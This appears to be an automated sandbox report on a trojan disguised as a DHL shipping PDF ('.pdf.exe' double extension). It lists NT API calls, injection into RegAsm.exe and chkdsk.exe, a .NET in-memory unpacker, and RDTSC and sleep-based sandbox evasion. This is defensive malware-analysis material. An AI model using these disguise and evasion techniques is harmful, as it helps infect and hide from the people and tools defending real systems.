Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D7DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CEEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D82B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D820A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D71002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CBF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D82EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CD6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D81FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CC841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D825DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CCD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CE2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D81D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D82D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CB0D20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04F98C90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04F98C8E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04F92D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04F92D88
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04F92FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FACB69

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: String function: 02CBB150 appears 35 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004185F0 NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004186A0 NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00418720 NtClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004187D0 NtAllocateVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004185EB NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004187CA NtAllocateVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9A80 NtOpenDirectoryObject,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9A10 NtQuerySection,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CFA3B0 NtGetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9B00 NtSetValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF98A0 NtWriteVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CFB040 NtSuspendThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9820 NtEnumerateKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF99D0 NtCreateProcessEx,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9950 NtQueueApcThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF96D0 NtCreateKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9650 NtQueryValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9670 NtQueryInformationProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9610 NtEnumerateValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9760 NtOpenProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9770 NtSetInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CFA770 NtOpenThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CFA710 NtOpenProcessToken,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9730 NtQueryVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF95F0 NtQueryInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9560 NtWriteFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CF9520 NtWaitForSingleObject,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02CFAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FA85F0 NtCreateFile,
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FA86A0 NtReadFile,
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FA87D0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FA8720 NtClose,
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FA85EB NtCreateFile,
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FA87CA NtAllocateVirtualMemory,

Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000000.289487536.0000000000BC6000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename44.exe4 vs DHL AWB# 4AB19037XXX.pdf.exe
Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameediskcz.dll0 vs DHL AWB# 4AB19037XXX.pdf.exe
Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314034652.00000000010E9000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DHL AWB# 4AB19037XXX.pdf.exe
Source: DHL AWB# 4AB19037XXX.pdf.exe	Binary or memory string: OriginalFilename44.exe4 vs DHL AWB# 4AB19037XXX.pdf.exe

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Section loaded: mscorjit.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll

Source: DHL AWB# 4AB19037XXX.pdf.exe	Virustotal: Detection: 33%
Source: DHL AWB# 4AB19037XXX.pdf.exe	ReversingLabs: Detection: 44%

Source: DHL AWB# 4AB19037XXX.pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe 'C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe'
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL AWB# 4AB19037XXX.pdf.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@12/6

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:120:WilError_01

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: DHL AWB# 4AB19037XXX.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DHL AWB# 4AB19037XXX.pdf.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: DHL AWB# 4AB19037XXX.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ediskcz.pdb source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp
Source:	Binary string: ediskcz.pdbh; source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.416441384.0000000002DAF000.00000040.00000001.sdmp, chkdsk.exe, 00000013.00000002.563005140.00000000053DF000.00000040.00000001.sdmp
Source:	Binary string: RegAsm.pdb source: chkdsk.exe, 00000013.00000002.559169564.00000000004F6000.00000004.00000020.sdmp
Source:	Binary string: c:\Users\Administrator\Desktop\44.pdbTBnB `B_CorExeMainmscoree.dll source: DHL AWB# 4AB19037XXX.pdf.exe
Source:	Binary string: wntdll.pdb source: RegAsm.exe, chkdsk.exe, 00000013.00000002.563005140.00000000053DF000.00000040.00000001.sdmp
Source:	Binary string: c:\Users\Administrator\Desktop\44.pdb source: DHL AWB# 4AB19037XXX.pdf.exe
Source:	Binary string: RegAsm.pdb4 source: chkdsk.exe, 00000013.00000002.559169564.00000000004F6000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: DHL AWB# 4AB19037XXX.pdf.exe, Form.cs	.Net Code: RawForm System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.DHL AWB# 4AB19037XXX.pdf.exe.bc0000.0.unpack, Form.cs	.Net Code: RawForm System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.bc0000.0.unpack, Form.cs	.Net Code: RawForm System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041B842 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041B84B push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041B8AC push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040BA4C push eax; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00409D1D push cs; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041B7F5 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041BFB7 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D0D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04F99D1D push cs; iretd
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FAB7F5 push eax; ret
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FABFB7 push es; ret
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FAB8AC push eax; ret
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FAB84B push eax; ret
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04FAB842 push eax; ret
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 19_2_04F9BA4C push eax; retf

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension)

Show sources

Source: Possible double extension: pdf.exe

Static PE information: DHL AWB# 4AB19037XXX.pdf.exe

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: explorer.exe, 00000007.00000000.346274551.000000000E2BF000.00000004.00000001.sdmp

Binary or memory string: DEMUL.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000004F98614 second address: 0000000004F9861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000004F989AE second address: 0000000004F989B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe TID: 5572	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe TID: 4884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 404	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 4780	Thread sleep time: -34000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_004088E0 rdtsc

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Thread delayed: delay time: 922337203685477

Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp	Binary or memory string: e48cvMCi6f
Source: explorer.exe, 00000007.00000000.329977812.000000000EE50000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.344459593.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.346864234.000000000EF2A000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}soft.wi
Source: explorer.exe, 00000007.00000000.367953216.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000007.00000000.322052236.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.344459593.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000007.00000000.322052236.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
